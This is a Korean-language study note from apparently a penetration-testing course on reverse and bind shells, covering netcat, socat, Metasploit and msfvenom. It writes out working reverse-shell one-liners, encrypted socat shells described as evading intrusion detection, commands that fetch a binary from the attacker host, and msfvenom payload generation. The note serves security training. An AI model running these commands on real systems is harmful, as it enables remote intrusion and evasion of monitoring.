shell
#
shell은 간단히 말해 CLI와 인터페이스할 때 사용하는 것이다.
원격 서버가 서버에 대한 명령줄 액세스를 보내거나(리버스 셸) 추가 명령을 실행하기 위해 연결할 수 있는 서버의 포트를 열도록 할 수 있다(바인드 셸).
#
tool

`netcat`

열거하는 동안 배너 잡기와 같은 것을 포함하여 모든 종류의 네트워크 상호 작용을 수동으로 수행하는 데 사용되지만 더 중요한 것은 리버스 셸을 수신하고 대상 시스템의 바인드 셸에 연결된 원격 포트에 연결하는 데 사용할 수 있다. Netcat 셸은 기본적으로 매우 불안정하지만(잃기 쉬움) 다음 작업에서 다룰 기술을 통해 개선할 수 있다.

`socat`

스테로이드의 netcat과 같다. 모든 동일한 작업 및 더 많은 작업을 수행할 수 있다 . Socat 셸은 일반적으로 즉시 사용할 수 있는 netcat 셸보다 더 안정적이다. 이러한 의미에서 netcat보다 훨씬 뛰어나다. 그러나 두 가지 큰 문제가 있다.

1. 구문이 더 어려움
2. Netcat은 기본적으로 거의 모든 Linux 배포판에 설치되지만 Socat은 기본적으로 거의 설치되지 않는다.

`metasploit`

Metasploit 프레임 워크의 `auxiliary/multi/handler` 모듈은 socat 및 netcat과 마찬가지로 리버스 셸을 수신하는 데 사용된다. Metasploit 프레임 워크의 일부이기 때문에 multi/handler는 안정된 셸을 얻을 수 있는 본격적인 방법을 제공하며 잡힌 쉘을 개선할 수 있는 다양한 추가 옵션을 제공한다. 이것은 또한 미터 프리터 셸과 상호 작용할 수있는 유일한 방법이며 스테이지 페이로드를 처리하는 가장 쉬운 방법이다.

`Msfvenom`

multi/handler처럼 msfvenom은 기술적으로 메타스플로이트 프레임워크의 일부이지만 독립형 도구로 제공된다. Msfvenom은 즉석에서 페이로드를 생성하는 데 사용된다. msfvenom은 리버스, 바인딩 셸 이외의 페이로드도 생성할 수 있다.

#
shell의 종류

- 리버스 셸
    - 대상이 강제로 컴퓨터에 다시 연결하는 코드를 실행하는 경우 
    - 로컬에서 이전 작업에서 언급한 도구 중 하나를 사용하여 연결을 수신하는 데 사용할 리스너를 설정
    - 대상의 임의 포트에 연결하지 못하도록 하는 방화벽 규칙을 우회하는 좋은 방법 
    - 그러나 인터넷을 통해 시스템에서 셸을 수신할 때 셸을 수락하도록 자체 네트워크를 구성해야 하는 단점

- 바인딩 셸
    - 대상에서 실행되는 코드가 셸에 연결된 리스너를 대상에서 직접 시작하는 데 사용
    - 그러면 인터넷에 열려 코드가 열린 포트에 연결하여 원격 코드를 실행할 수 있다. 
    - 이렇게 하면 네트워크에 아무런 구성도 필요하지 않다는 장점이 있지만 
    - 대상을 보호하는 방화벽에 의해 차단될 수 있다.

#
netcat

리버스 셸

`nc -lvnp <port-number>`

- -l 은 netcat에게 이것이 리스너가 될 것임을 알리는 데 사용
- -v 는 자세한 출력을 요청하는 데 사용
- -n 호스트 이름을 확인하거나 DNS를 사용하지 않도록 netcat에 지시
- -p 는 포트 사양이 따를 것임

잘 알려진 포트 번호(80, 443, 53이 좋은 선택)를 사용하는 것이 좋다. 이 번호는 대상의 아웃바운드 방화벽 규칙을 통과할 가능성이 더 높기 때문이다.

바인드 셸

대상에서 바인드 셸을 얻으려면 대상의 선택된 포트에 이미 리스너가 있다고 가정할 수 있다.

`nc <target-ip> <chosen-port>`


shell은 기본적으로 매우 불안정하다. Ctrl + C를 누르면 전체가 종료된다. 비대화형이며 종종 이상한 형식 오류가 있다. 이것은 netcat "셸"이 그 자체로 선의의 터미널이 아니라 실제로 터미널 내부 에서 실행되는 프로세스 이기 때문이다. 

Linux 시스템 에서 netcat 셸을 안정화하는 방법에는 여러 가지가 있다. 여기서 3가지를 살펴보겠다. 

Windows 리버스 셸의 안정화는 훨씬 더 어려운 경향이 있다. 그러나 여기에서 다룰 두 번째 기술은 특히 유용하다.


방법 1. 파이썬

1. 가장 먼저 할일은
`python -c 'import pty;pty.spawn("/bin/bash")'`을 사용하는 것이다. 필요에 따라 python, python2, python3로 바꾼다.

2. 두번째 단계로 `export TERM=xterm`. 이렇게 하면 `clear` 명령을 사용할 수 있다.

3. 마지막으로 가장 중요한 Ctrl + Z를 사용하여 셸의 배경을 지정한다. 우리 터미널에서는 `stty raw -echo; fg`를 사용한다. 먼저 터미널 에코를 끈다(탭 자동 완성, 화살표 키 및 프로세스를 종료하기 위한 Ctrl + C에 대한 액세스를 제공함) 그런 다음 셸을 foregrounds 시켜 과정을 완성한다.

방법 2. rlwrap

셸을 받는 즉시 히스토리, 탭 자동 완성, 화살표 키에 대한 액세스를 제공하는 프로그램이다 . 그러나 셸 내에서 Ctrl + C를 사용할 수 있으려면 일부 수동 안정화를 계속 사용해야 한다. rlwrap은 기본적으로 Kali에 설치되지 않으므로 먼저 `sudo apt install rlwrap`.

rlwrap을 사용하기 위해 리스너를 호출한다.

`rlwrap nc -lvnp <port>`

netcat 리스너 앞에 "rlwrap"을 추가하면 훨씬 더 완전한 기능을 갖춘 셸이 제공된다. 이 기술은 안정화하기 어려운 것으로 악명 높은 Windows 셸을 처리할 때 특히 유용하다. Linux 대상을 처리할 때 이전 기술의 3단계와 동일한 트릭을 사용하여 완전히 안정화하는 것이 가능하다. Ctrl + Z로 셸을 배경으로 한 다음 `stty raw -echo; fg`를 사용 하여 안정화하고 셸을 다시 입력한다.

방법 3. socat

쉘을 안정화하는 세 번째 쉬운 방법은 초기 netcat 쉘을 더 완전한 기능을 갖춘 socat 쉘로의 디딤돌로 사용하는 것이다. Windows의 Socat 셸은 netcat 셸보다 더 안정적이지 않으므로 이 기술은 Linux 대상으로 제한된다 . 이 안정화 방법을 수행하기 위해 먼저 socat 정적 컴파일 바이너리 (종속성이 없도록 컴파일된 프로그램 버전)를 대상 시스템으로 전송한다. 이를 달성하는 일반적인 방법은 socat 바이너리 `sudo python3 -m http.server 80`가 포함된 디렉토리 내부의 공격 시스템에서 웹 서버를 사용한 다음 대상 시스템에서 netcat 셸을 사용하여 파일을 다운로드하는 것이다. 리눅스에서는 `curl` 또는 wget `wget <LOCAL-IP>/socat -O /tmp/socat`을 사용하여 이 작업을 수행할 수 있다.

완전성을 위해 Windows CLI 환경에서는 설치된 Powershell 버전
`Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\\Windows\temp\socat.exe` 에 따라 Invoke-WebRequest 또는 webrequest 시스템 클래스를 사용하여 Powershell에서 동일한 작업을 수행할 수 있다 .

위의 기술중 하나를 사용하여 터미널 tty의 크기를 변경할 수 있으면 유용하다. 이것은 일반 셸을 사용할 때 터미널이 자동으로 수행하는 작업이다. 그러나 화면의 모든 것을 덮어쓰는 텍스트 편집기와 같은 것을 사용하려면 리버스 또는 바인드 셸에서 수동으로 수행해야한다.

먼저 다른 터미널을 열고 `stty -a`를 하면 많은 출력 스트림을 얻을 수 있다. 행, 열의 값을 기록해두자.
다음 명령어로 터미널의 행, 열의 크기를 설정할 수 있다.

`stty rows <number>`

`stty cols <number>`

#
socat

socat에 대해 생각하는 가장 쉬운 방법은 두 점 사이의 연결자로 생각하는 것이다. 이것은 본질적으로 수신 포트와 키보드가 될 것이지만 수신 포트와 파일 또는 실제로 두 개의 수신 포트가 될 수도 있다. socat이 하는 모든 일은 두 지점 사이에 링크를 제공하는 것뿐이다. Portal 게임의 포털 총과 매우 유사하다!

리버스 셸

기본 리버스 셸 수신기 구문 : `socat TCP-L:<port> -`

항상 2개의 포인트(수신 포트, 표준 입력)를 사용한다. 그리고 그것들을 연결한다. `nc -lvnp <port>`

Windows에서는 다음 명령을 사용하여 다시 연결한다. `socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes`
"pipes" 옵션은 powershell(또는 cmd.exe)이 Unix 스타일의 표준 입력 및 출력을 사용하도록 강제하는 데 사용된다.

다음은 Linux 대상 : `socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"`

바인드 셸

리눅스 대상 : `socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"`

Windows 대상 : `socat TCP-L:<PORT> EXEC:powershell.exe,pipes`

cli 환경에서 입출력을 처리하는 Unix와 Windows 방식 간의 인터페이스를 위해 "pipes" 인수를 사용한다.

대상에 관계없이 공격 시스템에서 이 명령을 사용하여 대기 중인 수신기에 연결한다. `socat TCP:<TARGET-IP>:<TARGET-PORT> -`


이제 socat의 강력한 용도 중 하나인 Linux tty 리버스 셸에 대해 알아보자. 이름대로 Linux에서만 작동한다.

`socat TCP-L:<port> FILE:\`tty\`,raw,echo=0`

이 명령을 두 부분으로 나눠보자. 평소와 같이 두 점을 연결한다.(수신포트와 파일) 현재 tty를 파일로 전달하고 에코를 0으로 설정한다. 이는 Netcat 셸과 함께 Ctrl + Z, `stty raw -echo; fg trick`을 사용하는 것과 거의 동일하며 즉시 안정화되고 전체 tty에 후킹할 수 있는 추가 보너스가 있다.

첫 번째 리스너는 페이로드와 연결할 수 있지만 이 특별한 리스너는 매우 특정한 socat 명령으로 활성화되어야 한다. 즉, 대상에 socat이 설치되어 있어야 한다. 대부분의 컴퓨터에는 기본적으로 socat이 설치되어 있지 않지만 미리 컴파일된 socat 바이너리를 업로드할 수 있으며 이 바이너리는 정상적으로 실행될 수 있다. 특수 명령은 다음과 같습니다. 

`socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane`

첫 번째 부분은 쉽다. 우리는 우리의 기계로 작동하는 청취자와 연결되고 있다. 명령의 두 번째 부분은 `EXEC:"bash -li"`를 사용하여 대화형 bash 세션을 만든다. 또한 pty, stderr, signint, setsid, sane의 인자를 전달하고 있다. 

- pty : target에 의사 터미널을 할당합니다 -- 안정화 프로세스 일부 
- stderr : 모든 오류 메시지가 셸에 표시되도록 한다(종종 대화형 셸이 아닌 경우 문제). 
- sigint : Ctrl + C 명령을 하위 프로세스로 전달하여 셸 내부의 명령을 실행할 수 있다.
- setsid : 새 세션에 프로세스 작성 
- sane : 터미널을 안정화하여 "정규화"하려고 합니다.

일반적으로 왼쪽에는 로컬 공격 머신에서 실행 중인 리스너가 있고 오른쪽에는 비대화형 쉘로 실행되는 손상된 대상의 시뮬레이션이 있다. 비대화형 netcat 셸을 사용하여 특별한 socat 명령을 실행하고 왼쪽의 socat 수신기에서 완전한 대화형 bash 셸을 수신한다.
![image](https://user-images.githubusercontent.com/61821641/148675479-da458417-27bf-4570-8bd7-3fa968513343.png)

socat 셸은 완전한 대화형이므로 SSH와 같은 대화형 명령을 사용할 수 있다. 그런 다음 Vim 또는 Nano와 같은 텍스트 편집기를 사용할 수 있도록 하는 이전 작업에서와 같이 stty 값을 설정하여 이를 더욱 개선할 수 있다.

socat 셸이 제대로 작동하지 않으면 `-d -d`명령 에 추가하여 자세한 정보를 늘릴 가치가 있다. 이것은 실험 목적으로 매우 유용하지만 일반적으로 일반적인 사용에는 필요하지 않다.

# 
socat 암호화 셸

셸을 암호화 하면 암호해독키 없이는 감시할 수 없으며 IDS를 우회할 수 있는 경우가 많다.

암호화 셸을 이용하려면 먼저 인증서를 설치해야 한다.

`openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt`

이 명령은 일치하는 인증서 파일, 자체 서명된 2048비트 RSA키를 생성하고 1년 미만 동안 유효하다. 

그런 다음 생성된 두파일을 .pem파일로 병합해야한다.

`cat shell.key shell.crt > shell.pem`

이제 리버스 셸 리스너를 설정할 때 다음을 사용한다.

`socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -`

생성된 인증서를 사용하여 OPENSSL 리스너를 설정한다. `verify=0`은 인증서가 인증기관에서 적절하게 서명되었는지 확인하려고 애쓰지 않도록 연결에 알려준다. 인증서는 수신중인 장치에서 사용해야한다. 

다시 연결하려면 다음을 사용해야한다.

`socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash`

바인드 셸에도 동일한 기술이 적용된다.

target : `socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes`

attacker : `socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -`

Windows target의 경우 리스너와 함께 인증서를 사용해야 하므로 바인드 셸을 위해 pem파일을 복사해야 한다. 

다음은 linux target의  OPENSSL Reverse Shell이다. 왼쪽이 공격자이고 오른쪽이 target이다.
![image](https://user-images.githubusercontent.com/61821641/148676741-c8b34ff7-8718-49ef-9d61-f6d9f3bb5c7e.png)

문제 

1.  tty 기술을 사용하여 OPENSSL-LISTENER를 설정하는 구문은 무엇입니까? 포트 53과 "encrypt.pem"이라는 PEM 파일을 사용합니다.

`socat OPENSSL-LISTENER:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0`

2. 
IP가 10.10.10.5인 경우 이 수신기에 다시 연결하는 데 어떤 구문을 사용하시겠습니까?

`socat OPENSSL:10.10.10.5:53,verify=0  EXEC:"bash -li",pty,stderr,sigint,setsid,sane`

#
일반적인 셸 페이로드

netcat을 사용하여 다음 리스너에 연결하면 대상에 바인드 셸이 생성

`nc -lvnp <PORT> -e /bin/bash`

리버스 셸의 경우 다시 연결하면 대상에 리버스 셸이 발생
`nc <LOCAL-IP> <PORT> -e /bin/bash`

#
msfvenom : 페이로드와 관련된 모든 것에 대한 원스톱 상점

Metasploit 프레임워크의 일부인 msfvenom은 주로 리버스, 바인드 셸용 코드를 생성하는 데 사용된다. 버퍼 오버플로 익스플로잇과 같은 것을 개발할 때 16진법 쉘코드를 생성하기 위해 저수준 익스플로잇 개발에서 광범위하게 사용된다. 그러나, 다양한 포맷의 페이로드를 생성하는데 사용될 수 있다 (예를 들면 .exe, .aspx, .war, .py). 여기서 사용할 것은 이 후자의 기능이다.

표준구문

`msfvenom -p <PAYLOAD> <OPTIONS>`

예를 들어 exe 형식으로 Windwos X64 리버스 셸을 생성하면

`msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>`

- -f <format> : 출력 형식을 지정한다. 여기서 exe
- -o <file> : 생성된 페이로드의 출력 위치, 파일 이름
- LHOST=<IP> : 다시 연결할 IP를 지정. 
- LPORT=<PORT> : 다시 연결할 로컬 시스템의 포트. (0~65535) 1024 미만의 포트는 제한되며 루트 권한으로 실행되는 리스너가 필요하다.
#
Staged vs Stageless

더 나아가기 전에 소개되어야 할 두 가지 개념이 있다: 
- staged 리버스 셸 페이로드
    - Staged 페이로드는 두 부분으로 전송된다. 
    - 첫 번째 부분은 Stager라고 불린다. 이것은 서버 자체에서 직접 실행되는 코드다. 대기 중인 리스너에 다시 연결되지만 실제로 그 자체로 리버스 셸 코드를 포함하지 않는다. 대신 리스너에 연결하여 실제 페이로드를 로드하기 위해 연결을 사용하여 직접 실행하고 기존의 안티바이러스 솔루션에 의해 걸릴 수 있는 디스크에 닿지 않도록 한다. 
    - 두 번째 부분은 Stager가 활성화될 때 다운로드되는 더 큰 리버스 셸 코드. 
    - 준비된 페이로드에는 특수 리스너(일반적으로 Metasploit multi/handler)가 필요하다.
- stageless 리버스 셸 페이로드
    - Stageless 페이로드가 더 흔하다. 우리가 지금까지 사용해 온 것이다. 실행 시 셸을 대기 중인 리스너로 즉시 되돌려 보내는 코드 조각이 하나 있다는 점에서 완전히 자급자족한다.


Stageless 페이로드들은 더 쉽게 사용하고 잡을 수 있는 경향이 있지만, 그것들은 또한 더 크고 바이러스 백신이나 침입 탐지 프로그램이 더 쉽게 발견하고 제거할 수 있다. 
Staged 페이로드는 사용하기 더 어렵지만 초기 스테이저는 훨씬 짧으며 바이러스 백신 소프트웨어가 놓치기도 한다. 

현대의 바이러스 백신 솔루션은 또한 안티맬웨어 스캔 인터페이스(AMSI)를 사용하여 스테이저에 의해 메모리에 로드되는 페이로드를 감지함으로써, Staged 페이로드를 이 영역에서 사용했을 때보다 덜 효과적으로 만든다.

#
Meterpreter

그것들은 완전히 안정적이어서 Windows 대상으로 작업할 때 매우 유용하다. 또한 파일 업로드 및 다운로드와 같은 자체 기능이 많이 내장되어 있다.

#
Payload Naming Conventions

msfvenom으로 작업할 때 명명 시스템이 작동하는 방식을 이해하는 것이 중요하다. 기본 규칙은 다음과 같다.

`<OS>/<arch>/<payload>`

예를 들어

`linux/x86/shell_reverse_tcp`

이렇게 하면 x86 Linux 대상에 대한 단계 없는 역방향 셸이 생성된다.

이 규칙의 예외는 Windows 32비트 대상이다. 이들의 경우 arch가 지정되지 않는다. 예:
`windows/shell_reverse_tcp`

64비트 Windows 대상의 경우 아치는 일반(x64)으로 지정된다.







#
reference
- [리버스 셸 cheat sheet](https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
